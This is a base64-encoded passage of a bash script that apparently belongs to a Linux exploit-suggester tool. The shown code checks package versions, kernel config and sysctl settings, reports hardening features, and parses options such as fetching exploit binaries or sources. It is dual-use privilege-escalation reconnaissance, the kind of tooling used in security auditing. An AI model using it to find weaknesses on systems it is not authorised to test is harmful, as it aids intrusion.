YSkKICAgIGVsaWYgWyAiJGRpc3RybyIgPSAiYXJjaCIgLW8gIiRkaXN0cm8iID0gIm1hbmphcm8iIF07IHRoZW4KICAgICAgICBQS0dfTElTVD0kKHBhY21hbiAtUSB8IGF3ayAne3ByaW50ICQxIi0iJDJ9JykKICAgIGVsaWYgWyAteCAvdXNyL2Jpbi9lcXVlcnkgXTsgdGhlbgogICAgICAgIFBLR19MSVNUPSQoL3Vzci9iaW4vZXF1ZXJ5IC0tcXVpZXQgbGlzdCAnKicgLUYgJyRuYW1lOiR2ZXJzaW9uJyB8IGN1dCAtZC8gLWYyLSB8IGF3ayAne3ByaW50ICQxIjoiJDJ9JykKICAgIGVsc2UKICAgICAgICAjIHBhY2thZ2VzIGxpc3Rpbmcgbm90IGF2YWlsYWJsZQogICAgICAgIFBLR19MSVNUPSIiCiAgICBmaQp9CgojIGZyb206IGh0dHBzOi8vc3RhY2tvdmVyZmxvdy5jb20vcXVlc3Rpb25zLzQwMjM4MzAvaG93LWNvbXBhcmUtdHdvLXN0cmluZ3MtaW4tZG90LXNlcGFyYXRlZC12ZXJzaW9uLWZvcm1hdC1pbi1iYXNoCnZlckNvbXBhcmlzaW9uKCkgewoKICAgIGlmIFtbICQxID09ICQyIF1dCiAgICB0aGVuCiAgICAgICAgcmV0dXJuIDAKICAgIGZpCgogICAgbG9jYWwgSUZTPS4KICAgIGxvY2FsIGkgdmVyMT0oJDEpIHZlcjI9KCQyKQoKICAgICMgZmlsbCBlbXB0eSBmaWVsZHMgaW4gdmVyMSB3aXRoIHplcm9zCiAgICBmb3IgKChpPSR7I3ZlcjFbQF19OyBpPCR7I3ZlcjJbQF19OyBpKyspKQogICAgZG8KICAgICAgICB2ZXIxW2ldPTAKICAgIGRvbmUKCiAgICBmb3IgKChpPTA7IGk8JHsjdmVyMVtAXX07IGkrKykpCiAgICBkbwogICAgICAgIGlmIFtbIC16ICR7dmVyMltpXX0gXV0KICAgICAgICB0aGVuCiAgICAgICAgICAgICMgZmlsbCBlbXB0eSBmaWVsZHMgaW4gdmVyMiB3aXRoIHplcm9zCiAgICAgICAgICAgIHZlcjJbaV09MAogICAgICAgIGZpCiAgICAgICAgaWYgKCgxMCMke3ZlcjFbaV19ID4gMTAjJHt2ZXIyW2ldfSkpCiAgICAgICAgdGhlbgogICAgICAgICAgICByZXR1cm4gMQogICAgICAgIGZpCiAgICAgICAgaWYgKCgxMCMke3ZlcjFbaV19IDwgMTAjJHt2ZXIyW2ldfSkpCiAgICAgICAgdGhlbgogICAgICAgICAgICByZXR1cm4gMgogICAgICAgIGZpCiAgICBkb25lCgogICAgcmV0dXJuIDAKfQoKZG9WZXJzaW9uQ29tcGFyaXNpb24oKSB7CiAgICBsb2NhbCByZXFWZXJzaW9uPSIkMSIKICAgIGxvY2FsIHJlcVJlbGF0aW9uPSIkMiIKICAgIGxvY2FsIGN1cnJlbnRWZXJzaW9uPSIkMyIKCiAgICB2ZXJDb21wYXJpc2lvbiAkY3VycmVudFZlcnNpb24gJHJlcVZlcnNpb24KICAgIGNhc2UgJD8gaW4KICAgICAgICAwKSBjdXJyZW50UmVsYXRpb249Jz0nOzsKICAgICAgICAxKSBjdXJyZW50UmVsYXRpb249Jz4nOzsKICAgICAgICAyKSBjdXJyZW50UmVsYXRpb249JzwnOzsKICAgIGVzYWMKCiAgICBpZiBbICIkcmVxUmVsYXRpb24iID09ICI9IiBdOyB0aGVuCiAgICAgICAgWyAkY3VycmVudFJlbGF0aW9uID09ICI9IiBdICYmIHJldHVybiAwCiAgICBlbGlmIFsgIiRyZXFSZWxhdGlvbiIgPT0gIj4iIF07IHRoZW4KICAgICAgICBbICRjdXJyZW50UmVsYXRpb24gPT0gIj4iIF0gJiYgcmV0dXJuIDAKICAgIGVsaWYgWyAiJHJlcVJlbGF0aW9uIiA9PSAiPCIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPCIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkcmVxUmVsYXRpb24iID09ICI+PSIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPSIgXSAmJiByZXR1cm4gMAogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPiIgXSAmJiByZXR1cm4gMAogICAgZWxpZiBbICIkcmVxUmVsYXRpb24iID09ICI8PSIgXTsgdGhlbgogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPSIgXSAmJiByZXR1cm4gMAogICAgICAgIFsgJGN1cnJlbnRSZWxhdGlvbiA9PSAiPCIgXSAmJiByZXR1cm4gMAogICAgZmkKfQoKY29tcGFyZVZhbHVlcygpIHsKICAgIGN1clZhbD0kMQogICAgdmFsPSQyCiAgICBzaWduPSQzCgogICAgaWYgWyAiJHNpZ24iID09ICI9PSIgXTsgdGhlbgogICAgICAgIFsgIiR2YWwiID09ICIkY3VyVmFsIiBdICYmIHJldHVybiAwCiAgICBlbGlmIFsgIiRzaWduIiA9PSAiIT0iIF07IHRoZW4KICAgICAgICBbICIkdmFsIiAhPSAiJGN1clZhbCIgXSAmJiByZXR1cm4gMAogICAgZmkKCiAgICByZXR1cm4gMQp9CgpjaGVja1JlcXVpcmVtZW50KCkgewogICAgI2VjaG8gIkNoZWNraW5nIHJlcXVpcmVtZW50OiAkMSIKICAgIGxvY2FsIElOPSIkMSIKICAgIGxvY2FsIHBrZ05hbWU9IiR7Mjo0fSIKCiAgICBpZiBbWyAiJElOIiA9fiBecGtnPS4qJCBdXTsgdGhlbgoKICAgICAgICAjIGFsd2F5cyB0cnVlIGZvciBMaW51eCBPUwogICAgICAgIFsgJHtwa2dOYW1lfSA9PSAibGludXgta2VybmVsIiBdICYmIHJldHVybiAwCgogICAgICAgICMgdmVyaWZ5IGlmIHBhY2thZ2UgaXMgcHJlc2VudCAKICAgICAgICBwa2c9JChlY2hvICIkUEtHX0xJU1QiIHwgZ3JlcCAtRSAtaSAiXiRwa2dOYW1lLVswLTldKyIgfCBoZWFkIC0xKQogICAgICAgIGlmIFsgLW4gIiRwa2ciIF07IHRoZW4KICAgICAgICAgICAgcmV0dXJuIDAKICAgICAgICBmaQoKICAgIGVsaWYgW1sgIiRJTiIgPX4gXnZlci4qJCBdXTsgdGhlbgogICAgICAgIHZlcnNpb249IiR7SU4vL1teMC05Ll0vfSIKICAgICAgICByZXN0PSIke0lOI3Zlcn0iCiAgICAgICAgb3BlcmF0b3I9JHtyZXN0JSR2ZXJzaW9ufQoKICAgICAgICBpZiBbICIkcGtnTmFtZSIgPT0gImxpbnV4LWtlcm5lbCIgLW8gIiRvcHRfY2hlY2tzZWNfbW9kZSIgPT0gInRydWUiIF07IHRoZW4KCiAgICAgICAgICAgICMgZm9yIC0tY3ZlbGlzdC1maWxlIG1vZGUgc2tpcCBrZXJuZWwgdmVyc2lvbiBjb21wYXJpc2lvbgogICAgICAgICAgICBbICIkb3B0X2N2ZWxpc3RfZmlsZSIgPSAidHJ1ZSIgXSAmJiByZXR1cm4gMAoKICAgICAgICAgICAgZG9WZXJzaW9uQ29tcGFyaXNpb24gJHZlcnNpb24gJG9wZXJhdG9yICRLRVJORUwgJiYgcmV0dXJuIDAKICAgICAgICBlbHNlCiAgICAgICAgICAgICMgZXh0cmFjdCBwYWNrYWdlIHZlcnNpb24gYW5kIGNoZWNrIGlmIHJlcXVpcmVtbnQgaXMgdHJ1ZQogICAgICAgICAgICBwa2c9JChlY2hvICIkUEtHX0xJU1QiIHwgZ3JlcCAtRSAtaSAiXiRwa2dOYW1lLVswLTldKyIgfCBoZWFkIC0xKQoKICAgICAgICAgICAgIyBza2lwIChpZiBydW4gd2l0aCAtLXNraXAtcGtnLXZlcnNpb25zKSB2ZXJzaW9uIGNoZWNraW5nIGlmIHBhY2thZ2Ugd2l0aCBnaXZlbiBuYW1lIGlzIGluc3RhbGxlZAogICAgICAgICAgICBbICIkb3B0X3NraXBfcGtnX3ZlcnNpb25zIiA9ICJ0cnVlIiAtYSAtbiAiJHBrZyIgXSAmJiByZXR1cm4gMAoKICAgICAgICAgICAgIyB2ZXJzaW9uaW5nOgogICAgICAgICAgICAjZWNobyAicGtnOiAkcGtnIgogICAgICAgICAgICBwa2dWZXJzaW9uPSQoZWNobyAiJHBrZyIgfCBncmVwIC1FIC1pIC1vIC1lICctW1wuMC05XCs6cF0rWy1cK10nIHwgY3V0IC1kJzonIC1mMiB8IHNlZCAncy9bXCstXS8vZycgfCBzZWQgJ3MvcFswLTldLy9nJykKICAgICAgICAgICAgI2VjaG8gInZlcnNpb246ICRwa2dWZXJzaW9uIgogICAgICAgICAgICAjZWNobyAib3BlcmF0b3I6ICRvcGVyYXRvciIKICAgICAgICAgICAgI2VjaG8gInJlcXVpcmVkIHZlcnNpb246ICR2ZXJzaW9uIgogICAgICAgICAgICAjZWNobwogICAgICAgICAgICBkb1ZlcnNpb25Db21wYXJpc2lvbiAkdmVyc2lvbiAkb3BlcmF0b3IgJHBrZ1ZlcnNpb24gJiYgcmV0dXJuIDAKICAgICAgICBmaQogICAgZWxpZiBbWyAiJElOIiA9fiBeeDg2XzY0JCBdXSAmJiBbICIkQVJDSCIgPT0gIng4Nl82NCIgLW8gIiRBUkNIIiA9PSAiIiBdOyB0aGVuCiAgICAgICAgcmV0dXJuIDAKICAgIGVsaWYgW1sgIiRJTiIgPX4gXng4NiQgXV0gJiYgWyAiJEFSQ0giID09ICJpMzg2IiAtbyAiJEFSQ0giID09ICJpNjg2IiAtbyAiJEFSQ0giID09ICIiIF07IHRoZW4KICAgICAgICByZXR1cm4gMAogICAgZWxpZiBbWyAiJElOIiA9fiBeQ09ORklHXy4qJCBdXTsgdGhlbgoKICAgICAgICAjIHNraXAgaWYgY2hlY2sgaXMgbm90IGFwcGxpY2FibGUgKC1rIG9yIC0tdW5hbWUgb3IgLXAgc2V0KSBvciBpZiB1c2VyIHNhaWQgc28gKC0tc2tpcC1tb3JlLWNoZWNrcykKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gInRydWUiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgIyBpZiBrZXJuZWwgY29uZmlnIElTIGF2YWlsYWJsZToKICAgICAgICBpZiBbIC1uICIkS0NPTkZJRyIgXTsgdGhlbgogICAgICAgICAgICBpZiAkS0NPTkZJRyB8IGdyZXAgLUUgLXFpICRJTjsgdGhlbgogICAgICAgICAgICAgICAgcmV0dXJuIDA7CiAgICAgICAgICAgICMgcmVxdWlyZWQgb3B0aW9uIHdhc24ndCBmb3VuZCwgZXhwbG9pdCBpcyBub3QgYXBwbGljYWJsZQogICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICByZXR1cm4gMTsKICAgICAgICAgICAgZmkKICAgICAgICAjIGNvbmZpZyBpcyBub3QgYXZhaWxhYmxlCiAgICAgICAgZWxzZQogICAgICAgICAgICByZXR1cm4gMDsKICAgICAgICBmaQogICAgZWxpZiBbWyAiJElOIiA9fiBec3lzY3RsOi4qJCBdXTsgdGhlbgoKICAgICAgICAjIHNraXAgaWYgY2hlY2sgaXMgbm90IGFwcGxpY2FibGUgKC1rIG9yIC0tdW5hbWUgb3IgLXAgbW9kZXMpIG9yIGlmIHVzZXIgc2FpZCBzbyAoLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAidHJ1ZSIgXSAmJiByZXR1cm4gMAoKICAgICAgICBzeXNjdGxDb25kaXRpb249IiR7SU46N30iCgogICAgICAgICMgZXh0cmFjdCBzeXNjdGwgZW50cnksIHJlbGF0aW9uIHNpZ24gYW5kIHJlcXVpcmVkIHZhbHVlCiAgICAgICAgaWYgZWNobyAkc3lzY3RsQ29uZGl0aW9uIHwgZ3JlcCAtcWkgIiE9IjsgdGhlbgogICAgICAgICAgICBzaWduPSIhPSIKICAgICAgICBlbGlmIGVjaG8gJHN5c2N0bENvbmRpdGlvbiB8IGdyZXAgLXFpICI9PSI7IHRoZW4KICAgICAgICAgICAgc2lnbj0iPT0iCiAgICAgICAgZWxzZQogICAgICAgICAgICBleGl0V2l0aEVyck1zZyAiV3Jvbmcgc3lzY3RsIGNvbmRpdGlvbi4gVGhlcmUgaXMgc3ludGF4IGVycm9yIGluIHlvdXIgZmVhdHVyZXMgREIuIEFib3J0aW5nLiIKICAgICAgICBmaQogICAgICAgIHZhbD0kKGVjaG8gIiRzeXNjdGxDb25kaXRpb24iIHwgYXdrIC1GICIkc2lnbiIgJ3twcmludCAkMn0nKQogICAgICAgIGVudHJ5PSQoZWNobyAiJHN5c2N0bENvbmRpdGlvbiIgfCBhd2sgLUYgIiRzaWduIiAne3ByaW50ICQxfScpCgogICAgICAgICMgZ2V0IGN1cnJlbnQgc2V0dGluZyBvZiBzeXNjdGwgZW50cnkKICAgICAgICBjdXJWYWw9JCgvc2Jpbi9zeXNjdGwgLWEgMj4gL2Rldi9udWxsIHwgZ3JlcCAiJGVudHJ5IiB8IGF3ayAtRic9JyAne3ByaW50ICQyfScpCgogICAgICAgICMgc3BlY2lhbCBjYXNlIGZvciAtLWNoZWNrc2VjIG1vZGU6IHJldHVybiAyIGlmIHRoZXJlIGlzIG5vIHN1Y2ggc3dpdGNoIGluIHN5c2N0bAogICAgICAgIFsgLXogIiRjdXJWYWwiIC1hICIkb3B0X2NoZWNrc2VjX21vZGUiID0gInRydWUiIF0gJiYgcmV0dXJuIDIKCiAgICAgICAgIyBmb3Igb3RoZXIgbW9kZXM6IHNraXAgaWYgdGhlcmUgaXMgbm8gc3VjaCBzd2l0Y2ggaW4gc3lzY3RsCiAgICAgICAgWyAteiAiJGN1clZhbCIgXSAmJiByZXR1cm4gMAoKICAgICAgICAjIGNvbXBhcmUgJiByZXR1cm4gcmVzdWx0CiAgICAgICAgY29tcGFyZVZhbHVlcyAkY3VyVmFsICR2YWwgJHNpZ24gJiYgcmV0dXJuIDAKCiAgICBlbGlmIFtbICIkSU4iID1+IF5jbWQ6LiokIF1dOyB0aGVuCgogICAgICAgICMgc2tpcCBpZiBjaGVjayBpcyBub3QgYXBwbGljYWJsZSAoLWsgb3IgLS11bmFtZSBvciAtcCBtb2Rlcykgb3IgaWYgdXNlciBzYWlkIHNvICgtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgWyAiJG9wdF9za2lwX21vcmVfY2hlY2tzIiA9ICJ0cnVlIiBdICYmIHJldHVybiAwCgogICAgICAgIGNtZD0iJHtJTjo0fSIKICAgICAgICBpZiBldmFsICIke2NtZH0iOyB0aGVuCiAgICAgICAgICAgIHJldHVybiAwCiAgICAgICAgZmkKICAgIGZpCgogICAgcmV0dXJuIDEKfQoKZ2V0S2VybmVsQ29uZmlnKCkgewoKICAgIGlmIFsgLWYgL3Byb2MvY29uZmlnLmd6IF0gOyB0aGVuCiAgICAgICAgS0NPTkZJRz0iemNhdCAvcHJvYy9jb25maWcuZ3oiCiAgICBlbGlmIFsgLWYgL2Jvb3QvY29uZmlnLWB1bmFtZSAtcmAgXSA7IHRoZW4KICAgICAgICBLQ09ORklHPSJjYXQgL2Jvb3QvY29uZmlnLWB1bmFtZSAtcmAiCiAgICBlbGlmIFsgLWYgIiR7S0JVSUxEX09VVFBVVDotL3Vzci9zcmMvbGludXh9Ii8uY29uZmlnIF0gOyB0aGVuCiAgICAgICAgS0NPTkZJRz0iY2F0ICR7S0JVSUxEX09VVFBVVDotL3Vzci9zcmMvbGludXh9Ly5jb25maWciCiAgICBlbHNlCiAgICAgICAgS0NPTkZJRz0iIgogICAgZmkKfQoKY2hlY2tzZWNNb2RlKCkgewoKICAgIE1PREU9MAoKICAgICMgc3RhcnQgYW5hbHlzaXMKZm9yIEZFQVRVUkUgaW4gIiR7RkVBVFVSRVNbQF19IjsgZG8KCiAgICAjIGNyZWF0ZSBhcnJheSBmcm9tIGN1cnJlbnQgZXhwbG9pdCBoZXJlIGRvYyBhbmQgZmV0Y2ggbmVlZGVkIGxpbmVzCiAgICBpPTAKICAgICMgKCctcicgaXMgdXNlZCB0byBub3QgaW50ZXJwcmV0IGJhY2tzbGFzaCB1c2VkIGZvciBiYXNoIGNvbG9ycykKICAgIHdoaWxlIHJlYWQgLXIgbGluZQogICAgZG8KICAgICAgICBhcnJbaV09IiRsaW5lIgogICAgICAgIGk9JCgoaSArIDEpKQogICAgZG9uZSA8PDwgIiRGRUFUVVJFIgoKCSMgbW9kZXM6IGtlcm5lbC1mZWF0dXJlICgxKSB8IGh3LWZlYXR1cmUgKDIpIHwgM3JkcGFydHktZmVhdHVyZSAoMykgfCBhdHRhY2stc3VyZmFjZSAoNCkKICAgIE5BTUU9IiR7YXJyWzBdfSIKICAgIFBSRV9OQU1FPSIke05BTUU6MDo4fSIKICAgIE5BTUU9IiR7TkFNRTo5fSIKICAgIGlmIFsgIiR7UFJFX05BTUV9IiA9ICJzZWN0aW9uOiIgXTsgdGhlbgoJCSMgYWR2YW5jZSB0byBuZXh0IE1PREUKCQlNT0RFPSQoKCRNT0RFICsgMSkpCgogICAgICAgIGVjaG8KICAgICAgICBlY2hvIC1lICIke2JsZHdodH0ke05BTUV9JHt0eHRyc3R9IgogICAgICAgIGVjaG8KICAgICAgICBjb250aW51ZQogICAgZmkKCiAgICBBVkFJTEFCTEU9IiR7YXJyWzFdfSIgJiYgQVZBSUxBQkxFPSIke0FWQUlMQUJMRToxMX0iCiAgICBFTkFCTEU9JChlY2hvICIkRkVBVFVSRSIgfCBncmVwICJlbmFibGVkOiAiIHwgYXdrIC1GJ2VkOiAnICd7cHJpbnQgJDJ9JykKICAgIGFuYWx5c2lzX3VybD0kKGVjaG8gIiRGRUFUVVJFIiB8IGdyZXAgImFuYWx5c2lzLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCgogICAgIyBzcGxpdCBsaW5lIHdpdGggYXZhaWxhYmlsaXR5IHJlcXVpcmVtZW50cyAmIGxvb3AgdGhydSBhbGwgYXZhaWxhYmlsaXR5IHJlcXMgb25lIGJ5IG9uZSAmIGNoZWNrIHdoZXRoZXIgaXQgaXMgbWV0CiAgICBJRlM9JywnIHJlYWQgLXIgLWEgYXJyYXkgPDw8ICIkQVZBSUxBQkxFIgogICAgQVZBSUxBQkxFX1JFUVNfTlVNPSR7I2FycmF5W0BdfQogICAgQVZBSUxBQkxFX1BBU1NFRF9SRVE9MAoJQ09ORklHPSIiCiAgICBmb3IgUkVRIGluICIke2FycmF5W0BdfSI7IGRvCgoJCSMgZmluZCBDT05GSUdfIG5hbWUgKGlmIHByZXNlbnQpIGZvciBjdXJyZW50IGZlYXR1cmUgKG9ubHkgZm9yIGRpc3BsYXkgcHVycG9zZXMpCgkJaWYgWyAteiAiJENPTkZJRyIgXTsgdGhlbgoJCQljb25maWc9JChlY2hvICIkUkVRIiB8IGdyZXAgIkNPTkZJR18iKQoJCQlbIC1uICIkY29uZmlnIiBdICYmIENPTkZJRz0iKCQoZWNobyAkUkVRIHwgY3V0IC1kJz0nIC1mMSkpIgoJCWZpCgogICAgICAgIGlmIChjaGVja1JlcXVpcmVtZW50ICIkUkVRIik7IHRoZW4KICAgICAgICAgICAgQVZBSUxBQkxFX1BBU1NFRF9SRVE9JCgoJEFWQUlMQUJMRV9QQVNTRURfUkVRICsgMSkpCiAgICAgICAgZWxzZQogICAgICAgICAgICBicmVhawogICAgICAgIGZpCiAgICBkb25lCgogICAgIyBzcGxpdCBsaW5lIHdpdGggZW5hYmxlbWVudCByZXF1aXJlbWVudHMgJiBsb29wIHRocnUgYWxsIGVuYWJsZW1lbnQgcmVxcyBvbmUgYnkgb25lICYgY2hlY2sgd2hldGhlciBpdCBpcyBtZXQKICAgIEVOQUJMRV9QQVNTRURfUkVRPTAKICAgIEVOQUJMRV9SRVFTX05VTT0wCiAgICBub1N5c2N0bD0wCiAgICBpZiBbIC1uICIkRU5BQkxFIiBdOyB0aGVuCiAgICAgICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJEVOQUJMRSIKICAgICAgICBFTkFCTEVfUkVRU19OVU09JHsjYXJyYXlbQF19CiAgICAgICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwogICAgICAgICAgICBjbWRTdGRvdXQ9JChjaGVja1JlcXVpcmVtZW50ICIkUkVRIikKICAgICAgICAgICAgcmV0VmFsPSQ/CiAgICAgICAgICAgIGlmIFsgJHJldFZhbCAtZXEgMCBdOyB0aGVuCiAgICAgICAgICAgICAgICBFTkFCTEVfUEFTU0VEX1JFUT0kKCgkRU5BQkxFX1BBU1NFRF9SRVEgKyAxKSkKICAgICAgICAgICAgZWxpZiBbICRyZXRWYWwgLWVxIDIgXTsgdGhlbgogICAgICAgICAgICAjIHNwZWNpYWwgY2FzZTogc3lzY3RsIGVudHJ5IGlzIG5vdCBwcmVzZW50IG9uIGdpdmVuIHN5c3RlbTogc2lnbmFsIGl0IGFzOiBOL0EKICAgICAgICAgICAgICAgIG5vU3lzY3RsPTEKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIGVsc2UKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIGZpCiAgICAgICAgZG9uZQogICAgZmkKCiAgICBmZWF0dXJlPSQoZWNobyAiJEZFQVRVUkUiIHwgZ3JlcCAiZmVhdHVyZTogIiB8IGN1dCAtZCcgJyAtZiAyLSkKCglpZiBbIC1uICIkY21kU3Rkb3V0IiBdOyB0aGVuCiAgICAgICAgaWYgWyAiJGNtZFN0ZG91dCIgLWVxIDAgXTsgdGhlbgogICAgICAgICAgICBzdGF0ZT0iWyAke3R4dHJlZH1TZXQgdG8gJGNtZFN0ZG91dCR7dHh0cnN0fSBdIgoJCQljbWRTdGRvdXQ9IiIKICAgICAgICBlbHNlCiAgICAgICAgICAgIHN0YXRlPSJbICR7dHh0Z3JufVNldCB0byAkY21kU3Rkb3V0JHt0eHRyc3R9IF0iCgkJCWNtZFN0ZG91dD0iIgogICAgICAgIGZpCiAgICBlbHNlCgoJdW5rbm93bj0iWyAke3R4dGdyYXl9VW5rbm93biR7dHh0cnN0fSAgXSIKCgkjIGZvciAzcmQgcGFydHkgKDMpIG1vZGUgZGlzcGxheSAiTi9BIiBvciAiRW5hYmxlZCIKCWlmIFsgJE1PREUgLWVxIDMgXTsgdGhlbgogICAgICAgIGVuYWJsZWQ9IlsgJHt0eHRncm59RW5hYmxlZCR7dHh0cnN0fSAgIF0iCiAgICAgICAgZGlzYWJsZWQ9IlsgICAke3R4dGdyYXl9Ti9BJHt0eHRyc3R9ICAgIF0iCgogICAgIyBmb3IgYXR0YWNrLXN1cmZhY2UgKDQpIG1vZGUgZGlzcGxheSAiTG9ja2VkIiBvciAiRXhwb3NlZCIKICAgIGVsaWYgWyAkTU9ERSAtZXEgNCBdOyB0aGVuCiAgICAgICBlbmFibGVkPSJbICR7dHh0cmVkfUV4cG9zZWQke3R4dHJzdH0gIF0iCiAgICAgICBkaXNhYmxlZD0iWyAke3R4dGdybn1Mb2NrZWQke3R4dHJzdH0gICBdIgoKCSNvdGhlciBtb2RlcyIgIkRpc2FibGVkIiAvICJFbmFibGVkIgoJZWxzZQoJCWVuYWJsZWQ9IlsgJHt0eHRncm59RW5hYmxlZCR7dHh0cnN0fSAgXSIKCQlkaXNhYmxlZD0iWyAke3R4dHJlZH1EaXNhYmxlZCR7dHh0cnN0fSBdIgoJZmkKCglpZiBbIC16ICIkS0NPTkZJRyIgLWEgIiRFTkFCTEVfUkVRU19OVU0iID0gMCBdOyB0aGVuCgkgICAgc3RhdGU9JHVua25vd24KICAgIGVsaWYgWyAkQVZBSUxBQkxFX1BBU1NFRF9SRVEgLWVxICRBVkFJTEFCTEVfUkVRU19OVU0gLWEgJEVOQUJMRV9QQVNTRURfUkVRIC1lcSAkRU5BQkxFX1JFUVNfTlVNIF07IHRoZW4KICAgICAgICBzdGF0ZT0kZW5hYmxlZAogICAgZWxzZQogICAgICAgIHN0YXRlPSRkaXNhYmxlZAoJZmkKCiAgICBmaQoKICAgIGVjaG8gLWUgIiAkc3RhdGUgJGZlYXR1cmUgJHt3aHR9JHtDT05GSUd9JHt0eHRyc3R9IgogICAgWyAtbiAiJGFuYWx5c2lzX3VybCIgXSAmJiBlY2hvIC1lICIgICAgICAgICAgICAgICRhbmFseXNpc191cmwiCiAgICBlY2hvCgpkb25lCgp9CgpkaXNwbGF5RXhwb3N1cmUoKSB7CiAgICBSQU5LPSQxCgogICAgaWYgWyAiJFJBTksiIC1nZSA2IF07IHRoZW4KICAgICAgICBlY2hvICJoaWdobHkgcHJvYmFibGUiCiAgICBlbGlmIFsgIiRSQU5LIiAtZ2UgMyBdOyB0aGVuCiAgICAgICAgZWNobyAicHJvYmFibGUiCiAgICBlbHNlCiAgICAgICAgZWNobyAibGVzcyBwcm9iYWJsZSIKICAgIGZpCn0KCiMgcGFyc2UgY29tbWFuZCBsaW5lIHBhcmFtZXRlcnMKQVJHUz0kKGdldG9wdCAtLW9wdGlvbnMgJFNIT1JUT1BUUyAgLS1sb25nb3B0aW9ucyAkTE9OR09QVFMgLS0gIiRAIikKWyAkPyAhPSAwIF0gJiYgZXhpdFdpdGhFcnJNc2cgIkFib3J0aW5nLiIKCmV2YWwgc2V0IC0tICIkQVJHUyIKCndoaWxlIHRydWU7IGRvCiAgICBjYXNlICIkMSIgaW4KICAgICAgICAtdXwtLXVuYW1lKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBVTkFNRV9BPSIkMSIKICAgICAgICAgICAgb3B0X3VuYW1lX3N0cmluZz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLVZ8LS12ZXJzaW9uKQogICAgICAgICAgICB2ZXJzaW9uCiAgICAgICAgICAgIGV4aXQgMAogICAgICAgICAgICA7OwogICAgICAgIC1ofC0taGVscCkKICAgICAgICAgICAgdXNhZ2UgCiAgICAgICAgICAgIGV4aXQgMAogICAgICAgICAgICA7OwogICAgICAgIC1mfC0tZnVsbCkKICAgICAgICAgICAgb3B0X2Z1bGw9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1nfC0tc2hvcnQpCiAgICAgICAgICAgIG9wdF9zdW1tYXJ5PXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtYnwtLWZldGNoLWJpbmFyaWVzKQogICAgICAgICAgICBvcHRfZmV0Y2hfYmlucz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLXN8LS1mZXRjaC1zb3VyY2VzKQogICAgICAgICAgICBvcHRfZmV0Y2hfc3Jjcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWt8LS1rZXJuZWwpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIEtFUk5FTD0iJDEiCiAgICAgICAgICAgIG9wdF9rZXJuZWxfdmVyc2lvbj10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWR8LS1zaG93LWRvcykKICAgICAgICAgICAgb3B0X3Nob3dfZG9zPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtcHwtLXBrZ2xpc3QtZmlsZSkKICAgICAgICAgICAgc2hpZnQKICAgICAgICAgICAgUEtHTElTVF9GSUxFPSIkMSIKICAgICAgICAgICAgb3B0X3BrZ2xpc3RfZmlsZT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1jdmVsaXN0LWZpbGUpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIENWRUxJU1RfRklMRT0iJDEiCiAgICAgICAgICAgIG9wdF9jdmVsaXN0X2ZpbGU9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tY2hlY2tzZWMpCiAgICAgICAgICAgIG9wdF9jaGVja3NlY19tb2RlPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLWtlcm5lbHNwYWNlLW9ubHkpCiAgICAgICAgICAgIG9wdF9rZXJuZWxfb25seT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS11c2Vyc3BhY2Utb25seSkKICAgICAgICAgICAgb3B0X3VzZXJzcGFjZV9vbmx5PXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLXNraXAtcGtnLXZlcnNpb25zKQogICAgICAgICAgICBvcHRfc2tpcF9wa2dfdmVyc2lvbnM9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgICopCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIGlmIFsgIiQjIiAhPSAiMCIgXTsgdGhlbgogICAgICAgICAgICAgICAgZXhpdFdpdGhFcnJNc2cgIlVua25vd24gb3B0aW9uICckMScuIEFib3J0aW5nLiIKICAgICAgICAgICAgZmkKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgICAgOzsKICAgIGVzYWMKICAgIHNoaWZ0CmRvbmUKCiMgY2hlY2sgQmFzaCB2ZXJzaW9uIChhc3NvY2lhdGl2ZSBhcnJheXMgbmVlZCBCYXNoIGluIHZlcnNpb24gNC4wKykKaWYgKChCQVNIX1ZFUlNJTkZPWzBdIDwgNCkpOyB0aGVuCiAgICBleGl0V2l0aEVyck1zZyAiU2NyaXB0IG5lZWRzIEJhc2ggaW4gdmVyc2lvbiA0LjAgb3IgbmV3ZXIuIEFib3J0aW5nLiIKZmkKCiMgZXhpdCBpZiBib3RoIC0ta2VybmVsIGFuZCAtLXVuYW1lIGFyZSBzZXQKWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBbICRvcHRfdW5hbWVfc3Ry